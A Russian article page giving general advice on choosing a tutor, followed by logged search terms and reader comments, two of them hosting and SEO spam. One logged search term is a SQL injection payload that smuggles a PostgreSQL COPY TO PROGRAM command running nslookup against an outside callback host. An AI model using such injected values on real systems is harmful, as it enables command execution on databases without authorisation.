Последние новости
Статьи /

Что нужно знать о репетиторах и репетиторстве

Стремление к знаниям и познанию нового приветствовались всегда. Еще со времен Советского Союза в нашу жизнь вошло такое понятие как репетиторство. Сейчас репетиторство выходит на качество новый уровень и это проявляется в том, что значительно вырос уровень требований к репетиторам, поменялись взгляды на базовую школу, увеличились школьные нагрузки.
Ведь известно, что репетиторство никто и никому не навязывает - это добровольное решение того или иного ученика (или его родителей), которому в силу определенных обстоятельств не хватает или недостаточно школьной программы для овладения тем или иным предметом.
Где и какого репетитора выбрать каждый решает сам для себя, но в любом случае необходимо обращать внимание на послужной список предполагаемого кандидата, всевозможные рекомендации и отзывы, а также стаж и опыт работы.
Многие стараются найти замену репетиторству в интернете, но зачастую такие попытки заканчиваются провалом, так как ничто не может заменить живое общение и разъяснение тех или иных аспектов изучаемого предмета.
Следует отметить, что родители не должные навязывать своему ребенку того или иного репетитора, если он ему не нравится. Хорошего результата такие занятия не принесут.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2412.1964.18d46.1.bxss.me
  • testing
  • что необходимо чтобы репетиторствовать
  • статья о репетиторстве
  • о репетиторстве статьи
4 комментария
makev / 17 июля 2012 / 15:07
Думаю, репетитора надо искать только по рекомендации надежных друзей. Очень часто встречаются недобросовестные преподаватели. Деньги берут, как правило, немаленькие, ребенка грузят разной ненужной информацией, а реальных знаний нет. Хороший репетитор всегда контактирует с родителями, информирует их об успехах и проблемах своего ученика. Это важно и для родителей, и для школьника
MsA / 18 июля 2012 / 15:40
Большинство преподавателей занимаются репетиторством только чтобы увеличить свой заработок. Ребенок к нему приходит за знаниями, репетитор же говорит купить книжку, в которой все в принципе расписано и учит по ней. Нет, не учит а просто читает данное издание книги с ребенком. Итог- куча выброшенных денег зря. Ведь ученик может и сам прочитать книгу. И лишь единицы репетиторов в полной мере выполняют данный вид работы должным образом.
ThomasCog / 25 марта 2018 / 16:31
заказать продвижение сайта яндексе логин в скайпе SEO PRO1
Danieljat / 3 мая 2018 / 09:27
если у тебя мало одного виртуального сервера, то есть дополнительный сервер виртуальную инфраструктуру с подходящей конфигурацией. настройка Вы сможете получить больше прибыли. Сервера размещаются на брендовом оборудовании имеется Дата-центр. rnНапишите в скайп seo pro1 Пишите промо код Алексей 980 висенНие скидки 20% rnРасскажите какой сервер вас интересует и вы его получите. rnСтоимость самая разная, подберем под ваши финансовые возможности. rnОбращайтесь в скайп и менеджер вам все объяснит rnЕсли скайп не подходит предоставим другие контакты
имя


Популярые сообщения